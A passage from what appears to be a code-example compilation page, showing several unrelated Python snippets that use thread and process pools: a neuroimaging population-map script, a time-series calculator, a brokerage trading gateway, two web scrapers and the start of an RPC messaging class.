        ####################################################################
        # Create population map from a session instance
        ####################################################################

        if session is None:
            print('{}: No session found'.format(name.name()))
            df.ix[index, 'valid'] = False
            lock.conditional_unlock(df, index, verbose)
            return

        if diffeomorphism_nb == 'identity':
            population_map = pmap_scanner(session=session,
                                          resolution=resolution,
                                          name=new_diffeomorphism)

            if verbose:
                if resolution:
                    print("""{}:
                    Standard space equals scanner space. Diffeomorphism
                    equals identity. Resolution is ({} mm)**3.""".format(
                        name.name(), resolution))
                else:
                    print("""{}:
                    Standard space equals scanner space. Diffeomorphism
                    equals identity. Resolution is native.""".format(
                        name.name()))

        ####################################################################
        # Create population map from a session and reference instance
        ####################################################################

        elif diffeomorphism_nb == 'scanner':
            if reference_maps is None:
                print('{}: No ReferenceMaps found'.format(name.name()))
                df.ix[index, 'valid'] = False
                lock.conditional_unlock(df, index, verbose)
                return

            if scan_cycle is None:
                population_map = pmap_scanner(session=session,
                                              reference_maps=reference_maps,
                                              resolution=resolution,
                                              name=new_diffeomorphism)

                if verbose:
                    if resolution:
                        print("""{}:
                        Standard space equals scanner space. Diffeomorphism
                        maps to the average position of the subject in the
                        scanner. Resolution is ({} mm)**3.""".format(
                            name.name(), resolution))
                    else:
                        print("""{}:
                        Standard space equals scanner space. Diffeomorphism
                        maps to the average position of the subject in the
                        scanner. Resolution is native.""".format(name.name()))

            else:
                try:
                    outlying_cycles = reference_maps.outlying_cycles
                except:
                    if verbose:
                        print("""{}:
                        I have found no information
                        about outlying scan cycles!""".format(name.name()))
                    outlying_cycles = None

                if outlying_cycles is None:
                    scan_cycle_to_use = scan_cycle[0]
                else:
                    if outlying_cycles[scan_cycle].all():
                        df.ix[index, 'valid'] = False
                        print("""{}:
                        All suggested reference cycles have been marked as
                        outlying. Unable to proceed. Please specify a
                        different scan cycle (using --cycle) as
                        reference.""".format(name.name()))
                        lock.conditional_unlock(df, index, verbose, True)
                        return
                    elif outlying_cycles[scan_cycle].any():
                        for c, co in zip(scan_cycle,
                                         outlying_cycles[scan_cycle]):
                            if co:
                                if verbose:
                                    print("""{}:
                                    Scan cycle {:d} marked as outlying,
                                    using fallback.""".format(name.name(), c))
                            else:
                                scan_cycle_to_use = c
                                break
                    else:
                        scan_cycle_to_use = scan_cycle[0]

                population_map = pmap_scanner(session=session,
                                              reference_maps=reference_maps,
                                              scan_cycle=scan_cycle_to_use,
                                              resolution=resolution,
                                              name=new_diffeomorphism)

                population_map.set_nb(
                    Image(reference=session.reference,
                          data=session.data[scan_cycle_to_use],
                          name=session.name.name() +
                          '-{:d}'.format(scan_cycle_to_use)))

                if verbose:
                    if resolution:
                        print("""{}:
                        Standard space equals scanner space,
                        diffeomorphism maps to subject position during
                        scan cycle: {:d}. Resolution is ({} mm)**3.""".format(
                            name.name(), scan_cycle_to_use, resolution))
                    else:
                        print("""{}:
                        Standard space equals scanner space,
                        diffeomorphism maps to subject position during
                        scan cycle: {:d}. Resolution is native.""".format(
                            name.name(), scan_cycle_to_use))

        ####################################################################
        # Create population map instance from a result instance
        ####################################################################

        elif (diffeomorphism_nb == 'fit'):

            if result is None:
                print('{}: No fit found'.format(name.name()))
                df.ix[index, 'valid'] = False
                lock.conditional_unlock(df, index, verbose)
                return

            population_map = result.population_map
            population_map.set_vb(
                template=result.get_field('intercept', 'point'))

            if verbose:
                print('{}: VB space equals reference space as given by fit'.
                      format(name.name()))

        else:
            print('{}: Diffeomorphism type not supported'.format(name.name()))

        if verbose > 2:
            print("""{}:
                {}
                {}""".format(name.name(),
                             population_map.diffeomorphism.describe(),
                             population_map.describe()))

        try:
            if verbose:
                print('{}: Save: {}'.format(name.name(), file_population_map))

            population_map.save(file_population_map)
            df.ix[index, 'locked'] = False

        except Exception as e:
            df.ix[index, 'valid'] = False
            print('{}: Unable to create: {}, {}'.format(
                name.name(), file_population_map, e))
            lock.conditional_unlock(df, index, verbose, True)
            return

        return

    ####################################################################

    if len(df) > 1 and ((args.cores is None) or (args.cores > 1)):
        try:
            pool = ThreadPool(args.cores)
            for index, name, files, instances in study_iterator:
                session = instances['session']
                reference_maps = instances['reference_maps']
                population_map = instances['population_map']
                result = instances['result']
                file_population_map = files['population_map']
                pool.apply_async(wm,
                                 args=(index, name, session, reference_maps,
                                       population_map, result,
                                       file_population_map))
            pool.close()
            pool.join()
        except Exception as e:
            pool.close()
            pool.terminate()
            print('Pool execution has been terminated')
            print(e)
        finally:
            files = df.ix[df.locked, 'population_map'].values
            if len(files) > 0:
                for f in files:
                    print('Unlock: {}'.format(f))
                    os.remove(f)
    else:
        try:
            print('Process protocol entries sequentially')
            for index, name, files, instances in study_iterator:
                session = instances['session']
                reference_maps = instances['reference_maps']
                population_map = instances['population_map']
                result = instances['result']
                file_population_map = files['population_map']
                wm(index, name, session, reference_maps, population_map,
                   result, file_population_map)
        finally:
            files = df.ix[df.locked, 'population_map'].values
            if len(files) > 0:
                for f in files:
                    print('Unlock: {}'.format(f))
                    os.remove(f)

    ####################################################################
    # Write study to disk
    ####################################################################

    if args.out is not None:
        if args.verbose:
            print('Save: {}'.format(args.out))

        dfile = os.path.dirname(args.out)
        if dfile and not isdir(dfile):
            os.makedirs(dfile)

        study.save(args.out)

    if args.push:
        if args.verbose:
            print('Save: {}'.format(args.study))
        study.save(args.study)
Example #41
0
    def getTimeSeriesStatsForBoxSingleDataSet(self, bounding_polygon, ds, start_seconds_from_epoch,
                                              end_seconds_from_epoch,
                                              apply_seasonal_cycle_filter=True, apply_low_pass_filter=True):

        the_time = datetime.now()
        daysinrange = self._tile_service.find_days_in_range_asc(bounding_polygon.bounds[1],
                                                                bounding_polygon.bounds[3],
                                                                bounding_polygon.bounds[0],
                                                                bounding_polygon.bounds[2],
                                                                ds,
                                                                start_seconds_from_epoch,
                                                                end_seconds_from_epoch)
        self.log.info("Finding days in range took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        if len(daysinrange) == 0:
            raise NoDataException(reason="No data found for selected timeframe")

        the_time = datetime.now()
        maxprocesses = int(self.algorithm_config.get("multiprocessing", "maxprocesses"))

        results = []
        if maxprocesses == 1:
            calculator = TimeSeriesCalculator()
            for dayinseconds in daysinrange:
                result = calculator.calc_average_on_day(bounding_polygon.wkt, ds, dayinseconds)
                results += [result] if result else []
        else:
            # Create a task to calc average difference for each day
            manager = Manager()
            work_queue = manager.Queue()
            done_queue = manager.Queue()
            for dayinseconds in daysinrange:
                work_queue.put(
                    ('calc_average_on_day', bounding_polygon.wkt, ds, dayinseconds))
            [work_queue.put(SENTINEL) for _ in xrange(0, maxprocesses)]

            # Start new processes to handle the work
            pool = Pool(maxprocesses)
            [pool.apply_async(pool_worker, (work_queue, done_queue)) for _ in xrange(0, maxprocesses)]
            pool.close()

            # Collect the results as [(day (in ms), average difference for that day)]
            for i in xrange(0, len(daysinrange)):
                result = done_queue.get()
                try:
                    error_str = result['error']
                    self.log.error(error_str)
                    raise NexusProcessingException(reason="Error calculating average by day.")
                except KeyError:
                    pass

                results += [result] if result else []

            pool.terminate()
            manager.shutdown()

        results = sorted(results, key=lambda entry: entry["time"])
        self.log.info("Time series calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        if apply_seasonal_cycle_filter:
            the_time = datetime.now()
            for result in results:
                month = datetime.utcfromtimestamp(result['time']).month
                month_mean, month_max, month_min = self.calculate_monthly_average(month, bounding_polygon.wkt, ds)
                seasonal_mean = result['mean'] - month_mean
                seasonal_min = result['min'] - month_min
                seasonal_max = result['max'] - month_max
                result['meanSeasonal'] = seasonal_mean
                result['minSeasonal'] = seasonal_min
                result['maxSeasonal'] = seasonal_max
            self.log.info(
                "Seasonal calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        the_time = datetime.now()
        filtering.applyAllFiltersOnField(results, 'mean', applySeasonal=False, applyLowPass=apply_low_pass_filter)
        filtering.applyAllFiltersOnField(results, 'max', applySeasonal=False, applyLowPass=apply_low_pass_filter)
        filtering.applyAllFiltersOnField(results, 'min', applySeasonal=False, applyLowPass=apply_low_pass_filter)

        if apply_seasonal_cycle_filter and apply_low_pass_filter:
            try:
                filtering.applyFiltersOnField(results, 'meanSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
                filtering.applyFiltersOnField(results, 'minSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
                filtering.applyFiltersOnField(results, 'maxSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
            except Exception as e:
                # If it doesn't work log the error but ignore it
                tb = traceback.format_exc()
                self.log.warn("Error calculating SeasonalLowPass filter:\n%s" % tb)

        self.log.info(
            "LowPass filter calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        return results, {}
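The multiprocessing branch above hands work to pool_worker processes through a managed work_queue and stops them with SENTINEL markers. A self-contained sketch of that queue-plus-sentinel pattern; the worker body here is illustrative, since the original pool_worker and SENTINEL come from the surrounding project:

# Sketch of the work_queue / done_queue / sentinel pattern (illustrative worker, not the original pool_worker).
from multiprocessing import Manager, Pool

SENTINEL = 'STOP'


def worker(work_queue, done_queue):
    # Consume tasks until the sentinel is seen, pushing one result per task.
    for task in iter(work_queue.get, SENTINEL):
        day = task[1]
        done_queue.put({'time': day, 'mean': float(day) / 10.0})


if __name__ == '__main__':
    days = [0, 1, 2, 3, 4]
    maxprocesses = 2

    manager = Manager()
    work_queue = manager.Queue()
    done_queue = manager.Queue()

    for day in days:
        work_queue.put(('calc_average_on_day', day))
    for _ in range(maxprocesses):
        work_queue.put(SENTINEL)

    pool = Pool(maxprocesses)
    for _ in range(maxprocesses):
        pool.apply_async(worker, (work_queue, done_queue))
    pool.close()

    results = [done_queue.get() for _ in range(len(days))]
    pool.join()
    print(sorted(results, key=lambda entry: entry['time']))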
Example #42
0
class TigerGateway(BaseGateway):
    """"""
    default_setting = {
        "tiger_id": "",
        "account": "",
        "standard_account": "",
        "private_key": '',
    }

    def __init__(self, event_engine):
        """Constructor"""
        super(TigerGateway, self).__init__(event_engine, "TIGER")

        self.tiger_id = ""
        self.account = ""
        self.standard_account = ""
        self.paper_account = ""
        self.language = ""

        self.client_config = None
        self.quote_client = None
        self.push_client = None

        self.local_id = 1000000
        self.tradeid = 0

        self.active = False
        self.queue = Queue()
        self.pool = None

        self.ID_TIGER2VT = {}
        self.ID_VT2TIGER = {}
        self.ticks = {}
        self.trades = set()
        self.contracts = {}
        self.symbol_names = {}

    def run(self):
        """"""
        while self.active:
            try:
                func, args = self.queue.get(timeout=0.1)
                func(*args)
            except Empty:
                pass

    def add_task(self, func, *args):
        """"""
        self.queue.put((func, [*args]))

    def connect(self, setting: dict):
        """"""
        self.private_key = setting['private_key']
        self.tiger_id = setting["tiger_id"]
        self.account = setting["account"]
        self.standard_account = setting["standard_account"]
        self.paper_account = setting["account"]
        self.language = Language.zh_CN

        # Start thread pool for REST call
        self.active = True
        self.pool = Pool(5)
        self.pool.apply_async(self.run)

        # Put connect tasks into the queue.
        self.init_client_config()
        self.add_task(self.connect_quote)
        self.add_task(self.connect_trade)
        self.add_task(self.connect_push)

    def init_client_config(self, sandbox=True):
        """"""
        self.client_config = TigerOpenClientConfig(sandbox_debug=sandbox)
        self.client_config.private_key = self.private_key
        self.client_config.tiger_id = self.tiger_id
        self.client_config.account = self.account
        self.client_config.standard_account = self.standard_account
        self.client_config.paper_account = self.paper_account
        self.client_config.language = self.language

    def connect_quote(self):
        """
        Connect to market data server.
        """
        try:
            self.quote_client = QuoteClient(self.client_config)
            self.symbol_names = dict(
                self.quote_client.get_symbol_names(lang=Language.zh_CN))
            self.query_contract()
        except ApiException:
            self.write_log("查询合约失败")
            return

        self.write_log("行情接口连接成功")
        self.write_log("合约查询成功")

    def connect_trade(self):
        """
        Connect to trade server.
        """
        self.trade_client = TradeClient(self.client_config)
        try:
            self.add_task(self.query_order)
            self.add_task(self.query_position)
            self.add_task(self.query_account)
        except ApiException:
            self.write_log("交易接口连接失败")
            return

        self.write_log("交易接口连接成功")

    def connect_push(self):
        """
        Connect to push server.
        """
        protocol, host, port = self.client_config.socket_host_port
        self.push_client = PushClient(host, port, (protocol == 'ssl'))
        self.push_client.connect(self.client_config.tiger_id,
                                 self.client_config.private_key)

        self.push_client.quote_changed = self.on_quote_change
        self.push_client.asset_changed = self.on_asset_change
        self.push_client.position_changed = self.on_position_change
        self.push_client.order_changed = self.on_order_change

        self.write_log("推送接口连接成功")

    def subscribe(self, req: SubscribeRequest):
        """"""
        self.push_client.subscribe_quote([req.symbol])
        self.push_client.subscribe_asset()
        self.push_client.subscribe_position()
        self.push_client.subscribe_order()

    def on_quote_change(self, tiger_symbol: str, data: list, trading: bool):
        """"""
        data = dict(data)
        symbol, exchange = convert_symbol_tiger2vt(tiger_symbol)

        tick = self.ticks.get(symbol, None)
        if not tick:
            tick = TickData(
                symbol=symbol,
                exchange=exchange,
                gateway_name=self.gateway_name,
                datetime=datetime.now(),
                name=self.symbol_names[symbol],
            )
            self.ticks[symbol] = tick

        tick.datetime = datetime.fromtimestamp(data["latest_time"] / 1000)
        tick.pre_close = data.get("prev_close", 0)
        tick.last_price = data.get("latest_price", 0)
        tick.volume = data.get("volume", 0)
        tick.open_price = data.get("open", 0)
        tick.high_price = data.get("high", 0)
        tick.low_price = data.get("low", 0)
        tick.ask_price_1 = data.get("ask_price", 0)
        tick.bid_price_1 = data.get("bid_price", 0)
        tick.ask_volume_1 = data.get("ask_size", 0)
        tick.bid_volume_1 = data.get("bid_size", 0)

        self.on_tick(copy(tick))

    def on_asset_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        if "net_liquidation" not in data:
            return

        account = AccountData(
            accountid=tiger_account,
            balance=data["net_liquidation"],
            frozen=0.0,
            gateway_name=self.gateway_name,
        )
        self.on_account(account)

    def on_position_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        symbol, exchange = convert_symbol_tiger2vt(data["origin_symbol"])

        pos = PositionData(
            symbol=symbol,
            exchange=exchange,
            direction=Direction.NET,
            volume=int(data["quantity"]),
            frozen=0.0,
            price=data["average_cost"],
            pnl=data["unrealized_pnl"],
            gateway_name=self.gateway_name,
        )
        self.on_position(pos)

    def on_order_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        print("委托推送", data["origin_symbol"], data["order_id"], data["filled"],
              data["status"])
        symbol, exchange = convert_symbol_tiger2vt(data["origin_symbol"])
        status = PUSH_STATUS_TIGER2VT[data["status"]]

        order = OrderData(
            symbol=symbol,
            exchange=exchange,
            orderid=self.ID_TIGER2VT.get(str(data["order_id"]),
                                         self.get_new_local_id()),
            direction=Direction.NET,
            price=data.get("limit_price", 0),
            volume=data["quantity"],
            traded=data["filled"],
            status=status,
            time=datetime.fromtimestamp(data["order_time"] /
                                        1000).strftime("%H:%M:%S"),
            gateway_name=self.gateway_name,
        )
        self.on_order(order)

        if status == Status.ALLTRADED:
            self.tradeid += 1

            trade = TradeData(
                symbol=symbol,
                exchange=exchange,
                direction=Direction.NET,
                tradeid=self.tradeid,
                orderid=self.ID_TIGER2VT[str(data["order_id"])],
                price=data["avg_fill_price"],
                volume=data["filled"],
                time=datetime.fromtimestamp(data["trade_time"] /
                                            1000).strftime("%H:%M:%S"),
                gateway_name=self.gateway_name,
            )
            self.on_trade(trade)

    def get_new_local_id(self):
        self.local_id += 1
        return self.local_id

    def send_order(self, req: OrderRequest):
        """"""
        local_id = self.get_new_local_id()
        order = req.create_order_data(local_id, self.gateway_name)

        self.on_order(order)
        self.add_task(self._send_order, req, local_id)
        return order.vt_orderid

    def _send_order(self, req: OrderRequest, local_id):
        """"""
        currency = config_symbol_currency(req.symbol)
        try:
            contract = self.trade_client.get_contracts(symbol=req.symbol,
                                                       currency=currency)[0]
            order = self.trade_client.create_order(
                account=self.account,
                contract=contract,
                action=DIRECTION_VT2TIGER[req.direction],
                order_type=ORDERTYPE_VT2TIGER[req.type],
                quantity=int(req.volume),
                limit_price=req.price,
            )
            self.ID_TIGER2VT[str(order.order_id)] = local_id
            self.ID_VT2TIGER[local_id] = str(order.order_id)

            self.trade_client.place_order(order)
            print("发单:", order.contract.symbol, order.order_id, order.quantity,
                  order.status)

        except:  # noqa
            traceback.print_exc()
            self.write_log("发单失败")
            return

    def cancel_order(self, req: CancelRequest):
        """"""
        self.add_task(self._cancel_order, req)

    def _cancel_order(self, req: CancelRequest):
        """"""
        try:
            order_id = self.ID_VT2TIGER[req.orderid]
            data = self.trade_client.cancel_order(order_id=order_id)
        except ApiException:
            self.write_log(f"Order cancellation failed: {req.orderid}")
            return

        if not data:
            self.write_log("Order cancelled")

    def query_contract(self):
        """"""
        # HK Stock

        symbols_names_HK = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.HK)
        contract_names_HK = DataFrame(symbols_names_HK,
                                      columns=['symbol', 'name'])

        contractList = list(contract_names_HK["symbol"])
        i, n = 0, len(contractList)
        result = pd.DataFrame()
        while i < n:
            i += 500
            c = contractList[i - 500:i]
            r = self.quote_client.get_trade_metas(c)
            result = result.append(r)

        contract_detail_HK = result.sort_values(by="symbol", ascending=True)
        contract_HK = pd.merge(contract_names_HK,
                               contract_detail_HK,
                               how='left',
                               on='symbol')

        for ix, row in contract_HK.iterrows():
            contract = ContractData(
                symbol=row["symbol"],
                exchange=Exchange.SEHK,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=row["min_tick"],
                net_position=True,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

        # US Stock
        symbols_names_US = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.US)
        contract_US = DataFrame(symbols_names_US, columns=['symbol', 'name'])

        for ix, row in contract_US.iterrows():
            contract = ContractData(
                symbol=row["symbol"],
                exchange=Exchange.SMART,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=0.001,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

        # CN Stock
        symbols_names_CN = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.CN)
        contract_CN = DataFrame(symbols_names_CN, columns=['symbol', 'name'])

        for ix, row in contract_CN.iterrows():
            symbol = row["symbol"]
            symbol, exchange = convert_symbol_tiger2vt(symbol)

            contract = ContractData(
                symbol=symbol,
                exchange=exchange,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=0.001,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

    def query_account(self):
        """"""
        try:
            assets = self.trade_client.get_assets()
        except ApiException:
            self.write_log("查询资金失败")
            return

        for i in assets:
            account = AccountData(
                accountid=self.account,
                balance=i.summary.net_liquidation,
                frozen=0.0,
                gateway_name=self.gateway_name,
            )

            self.on_account(account)

    def query_position(self):
        """"""
        try:
            position = self.trade_client.get_positions()
        except ApiException:
            self.write_log("查询持仓失败")
            return

        for i in position:
            symbol, exchange = convert_symbol_tiger2vt(i.contract.symbol)

            pos = PositionData(
                symbol=symbol,
                exchange=exchange,
                direction=Direction.NET,
                volume=int(i.quantity),
                frozen=0.0,
                price=i.average_cost,
                pnl=float(i.unrealized_pnl),
                gateway_name=self.gateway_name,
            )

            self.on_position(pos)

    def query_order(self):
        """"""
        try:
            data = self.trade_client.get_orders()
            data = sorted(data, key=lambda x: x.order_time, reverse=False)
        except:  # noqa
            traceback.print_exc()
            self.write_log("查询委托失败")
            return

        self.process_order(data)
        self.process_deal(data)

    def close(self):
        """"""
        self.active = False

        if self.push_client:
            self.push_client.disconnect()

    def process_order(self, data):
        """"""
        for i in data:
            symbol, exchange = convert_symbol_tiger2vt(str(i.contract))
            local_id = self.get_new_local_id()

            order = OrderData(
                symbol=symbol,
                exchange=exchange,
                orderid=local_id,
                direction=Direction.NET,
                price=i.limit_price if i.limit_price else 0.0,
                volume=i.quantity,
                traded=i.filled,
                status=STATUS_TIGER2VT[i.status],
                time=datetime.fromtimestamp(i.order_time /
                                            1000).strftime("%H:%M:%S"),
                gateway_name=self.gateway_name,
            )
            self.ID_TIGER2VT[str(i.order_id)] = local_id
            self.on_order(order)

        self.ID_VT2TIGER = {v: k for k, v in self.ID_TIGER2VT.items()}
        print("原始委托字典", self.ID_TIGER2VT)
        print("原始反向字典", self.ID_VT2TIGER)

    def process_deal(self, data):
        """
        Process trade data for both query and update.
        """
        for i in data:
            if i.status == ORDER_STATUS.PARTIALLY_FILLED or i.status == ORDER_STATUS.FILLED:
                symbol, exchange = convert_symbol_tiger2vt(str(i.contract))
                self.tradeid += 1

                trade = TradeData(
                    symbol=symbol,
                    exchange=exchange,
                    direction=Direction.NET,
                    tradeid=self.tradeid,
                    orderid=self.ID_TIGER2VT[str(i.order_id)],
                    price=i.avg_fill_price,
                    volume=i.filled,
                    time=datetime.fromtimestamp(i.trade_time /
                                                1000).strftime("%H:%M:%S"),
                    gateway_name=self.gateway_name,
                )

                self.on_trade(trade)
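TigerGateway above funnels every REST call through a Queue that a pool-driven run loop drains, so API calls never block the caller. A reduced sketch of that producer/consumer shape; the class and task below are invented for illustration:

# Sketch of the queued-task consumer driven by pool.apply_async(self.run) (illustrative class).
from multiprocessing.dummy import Pool
from queue import Queue, Empty
import time


class MiniGateway:
    def __init__(self):
        self.active = False
        self.queue = Queue()
        self.pool = None

    def run(self):
        # Drain (func, args) tuples until the gateway is closed.
        while self.active:
            try:
                func, args = self.queue.get(timeout=0.1)
                func(*args)
            except Empty:
                pass

    def add_task(self, func, *args):
        self.queue.put((func, list(args)))

    def connect(self):
        self.active = True
        self.pool = Pool(1)
        self.pool.apply_async(self.run)   # the run loop occupies one pool thread
        self.add_task(print, 'connected')

    def close(self):
        self.active = False
        self.pool.close()
        self.pool.join()


gw = MiniGateway()
gw.connect()
time.sleep(0.5)   # give the background loop time to process the task
gw.close()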
Example #43
0
class NewsSpider:
    def __init__(self):
        self.url_temp = "https://no.imwu-nl.com/articles/news/page{}/"  # 用于拼接的URL地址,加大括号是为了format赋值
        self.url_temp_header = "https://no.imwu-nl.com/articles/news/"  # 首页URL地址
        self.host_header = "https://sv.imwu-nl.com"  # 相当于host,用于拼接全详情也URL
        self.headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/604.1.34 (KHTML, "
            "like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1"
        }
        self.queue = Queue()  # 实例化一个队列
        self.pool = Pool(5)  # 实例化一个线程池,最大为5
        self.cookies = {
            "security_session_mid_verify": "e63dce6af1e6dee46a3a145b79f7557d"
        }  # 针对一些有反爬措施的网站,带上cookie
        self.is_running = True  # 回调标志位
        self.total_requests_num = 0  # 待完成任务数量
        self.total_response_num = 0  # 完成任务数量

    def parse_url_list(self, html):
        # Parse the list-page HTML and extract the detail-page URLs
        html = etree.HTML(html)
        url_list = html.xpath(
            "//div[@class='post-card__info']/h2[@class='post-card__title']/a/@href"
        )
        return url_list

    def get_url_list(self):
        # Build the list-page URLs, complete the detail-page URLs and push them onto the queue
        for i in range(2000, 4000):  # range is half-open; i is the current page number
            if i == 1:  # the home page has no page suffix, so use the header URL
                html = self.parse_url(self.url_temp_header)
            else:
                html = self.parse_url(self.url_temp.format(i))
            # Extract the detail-page URLs and add them to the task queue
            url_list = self.parse_url_list(html)
            for url in url_list:
                url = self.host_header + url  # complete the detail-page URL if it is relative
                print(url)
                self.queue.put(url)  # one more task on the queue
                self.total_requests_num += 1  # one more request expected

    def parse_url(self, url):
        time.sleep(0.5)
        # Send the request and get the response
        response = requests.get(url, headers=self.headers)
        # If a session is needed, comment out the line above and use the code below instead
        # session = requests.session()
        # response = session.get(url, headers=headers)
        return response.content.decode()  # if .content cannot be decoded, switch to response.text

    def split_content(self, content):
        """
        根据标点符号切割文本句子
        :param content: 原始字符串
        :return: 切割后的文本
        """
        content_list = list()
        e = 0
        for k, v in enumerate(content):
            if k == 0:
                if v == ".":
                    e = 1
            elif k < len(content) - 1:
                if v == ".":
                    if content[k - 1] != "." and content[k + 1] != ".":
                        if content[k -
                                   1].isdecimal() and content[k +
                                                              1].isdecimal():
                            continue
                        if content[k - 1].isalpha() and content[k +
                                                                1].isalpha():
                            continue
                        content_list.append(content[e:k].strip())
                        e = k + 1
                if v == "?":
                    if content[k - 1] != "?" and content[
                            k + 1] != "?" and content[k + 1] != ")":
                        content_list.append(content[e:k + 1].strip())
                        e = k + 1
                # if v == ";" and len(content) > 200:
                #     content_list.append(content[e:k + 1].strip())
                #     e = k + 1
                if v == "!":
                    content_list.append(content[e:k + 1].strip())
                    e = k + 1
            else:
                if v == ".":
                    content_list.append(content[e:-1].strip())
                else:
                    content_list.append(content[e:].strip())
        return content_list

    def get_content_list(self, html_str):
        # Extract the text content of the detail page and return a list of text blocks
        html = etree.HTML(html_str)
        contents = html.xpath(
            "//article[@class='post']/div[@class='post-content']/p/text()")
        content_list = []
        for content in contents:
            # if letter_regex.findall(content):
            #     continue
            if content.strip():
                content_merge_list = self.split_content(
                    content.replace("\u200b", "").replace(u'\xa0', u' '))
                content_list.append(content_merge_list)
        return content_list

    def save_content_list(self, content_list):
        # Save the data to a local file
        with open('挪威语——新闻——科技新闻-sv.imwu-nl.com2000-4000.txt',
                  'a',
                  encoding='utf-8') as f:
            for contents in content_list:
                for content in contents:
                    if len(content) < 5:
                        continue
                    f.write(content + '\n')

    def exetute_requests_item_save(self):
        # Full processing logic for a single request
        url = self.queue.get()  # take one URL from the queue
        print(url)
        html_str = self.parse_url(url)  # send the request and get the response body
        content_list = self.get_content_list(html_str)  # parse the response into roughly cleaned text
        self.save_content_list(content_list)  # save to a local file
        self.total_response_num += 1  # one more task completed

    def _callback(self, temp):
        # Keep the task re-submitting itself asynchronously; self.is_running is the exit condition
        if self.is_running:
            self.pool.apply_async(self.exetute_requests_item_save,
                                  callback=self._callback)

    def run(self):
        # Main routine
        self.get_url_list()  # put all detail-page URLs onto the queue

        for i in range(10):  # limit concurrency
            self.pool.apply_async(self.exetute_requests_item_save,
                                  callback=self._callback)

        while True:  # keep the main thread alive
            time.sleep(0.0001)  # avoid spinning the CPU at full speed
            print("Total tasks: %s, completed: %s" %
                  (self.total_requests_num, self.total_response_num))
            if self.total_response_num >= self.total_requests_num:
                self.is_running = False
                break

        self.pool.close()  # close the pool so no new tasks are accepted
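The _callback trick above keeps a fixed number of tasks in flight: each finished task re-submits itself until is_running is cleared. A minimal version of that self-rescheduling callback, with an illustrative work function and counter that are not from the original:

# Sketch of the self-rescheduling callback used above (illustrative work function).
from multiprocessing.dummy import Pool
from queue import Queue, Empty
import time

task_queue = Queue()
for n in range(20):
    task_queue.put(n)

pool = Pool(5)
is_running = True
done = []                       # list.append is thread-safe, so it doubles as a counter


def work():
    try:
        item = task_queue.get_nowait()
    except Empty:
        return
    time.sleep(0.05)            # stand-in for the network request
    done.append(item)


def reschedule(_result):
    # Re-submit the same task as long as the run flag is set.
    if is_running:
        pool.apply_async(work, callback=reschedule)


for _ in range(5):              # keep five tasks in flight
    pool.apply_async(work, callback=reschedule)

while len(done) < 20:
    time.sleep(0.01)
is_running = False
time.sleep(0.2)                 # let in-flight callbacks observe the flag before closing
pool.close()
pool.join()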
Example #44
0
#!/usr/bin/python
# -*- coding: utf-8 -*-

from multiprocessing.dummy import Pool as ThreadPool
from bilisupport import TAGLIST, ERRORLIST, API_TAGINFO
import requests


def taginfo(tid):
    '''Fetch info for a tag'''
    if not tid:
        return 404
    tid = int(tid)
    tagparams = {'id': tid, 'jsonp': 'jsonp'}
    info = requests.get(url=API_TAGINFO, params=tagparams).json()
    if info.get('code') == 0:
        print(info.get('result'))
        TAGLIST.update({'tag_id': tid}, {'$set': info.get('result')},
                       upsert=True)
    else:
        ERRORLIST.insert_one({'tag_id': tid})


if __name__ == '__main__':
    # taginfo(2053)
    MULTIPOOL = ThreadPool(4)
    for i in range(1, 1773900):
        MULTIPOOL.apply_async(taginfo, (i, ))
    MULTIPOOL.close()
    MULTIPOOL.join()
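
Example #44 discards the AsyncResult returned by apply_async, so any exception raised inside taginfo (a failed HTTP request, a JSON decode error) is silently lost. The sketch below shows one way to surface those errors; fetch_one() and log_error() are placeholders, and error_callback assumes Python 3.

# Minimal sketch: keep the AsyncResult handles (or pass error_callback)
# so exceptions raised inside the worker are not lost.
from multiprocessing.dummy import Pool as ThreadPool


def fetch_one(i):
    if i % 5 == 0:                       # placeholder failure condition
        raise ValueError("failed on %d" % i)
    return i * i


def log_error(exc):
    # Runs in the pool's result-handler thread whenever a task raises.
    print("task failed:", exc)


if __name__ == '__main__':
    pool = ThreadPool(4)
    results = [
        pool.apply_async(fetch_one, (i, ), error_callback=log_error)
        for i in range(20)
    ]
    pool.close()
    pool.join()
    # .successful() is safe after join(); .get() would re-raise the exception.
    ok = [r.get() for r in results if r.successful()]
    print("succeeded: %d of %d" % (len(ok), len(results)))
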
Example #45
0
class RpcLayer(JsonRpcMessageApplication):
    def __init__(self, host_url=u"amqp://127.0.0.1", ioloop=None, **params):
        super(RpcLayer, self).__init__(host_url=host_url,
                                       ioloop=ioloop,
                                       **params)
        self._pending = dict()
        self._pool = Pool()
        self.msg_handler = None

    def send_result(self, receiver, result, id):

        exchange = str(receiver).split(".")[0]
        self.route(receiver,
                   JsonRPCResult(result=result, id=id),
                   exchange=exchange)

    def send_error(self, receiver, code, id, *args, **kwargs):
        self.route(receiver,
                   JsonRPCError(code=code, id=id, args=args, kwargs=kwargs))

    def call(self, method, *args, **kwargs):

        corr_id = str(uuid.uuid4())
        ret = Deferred()
        self._pending[corr_id] = ret
        self.route(
            method,
            JsonRPCCall(method=method, args=args, kwargs=kwargs, id=corr_id))
        return ret

    def publish(self, routing_key, msg, **params):

        corr_id = str(uuid.uuid4())
        ret = Deferred()
        self._pending[corr_id] = ret
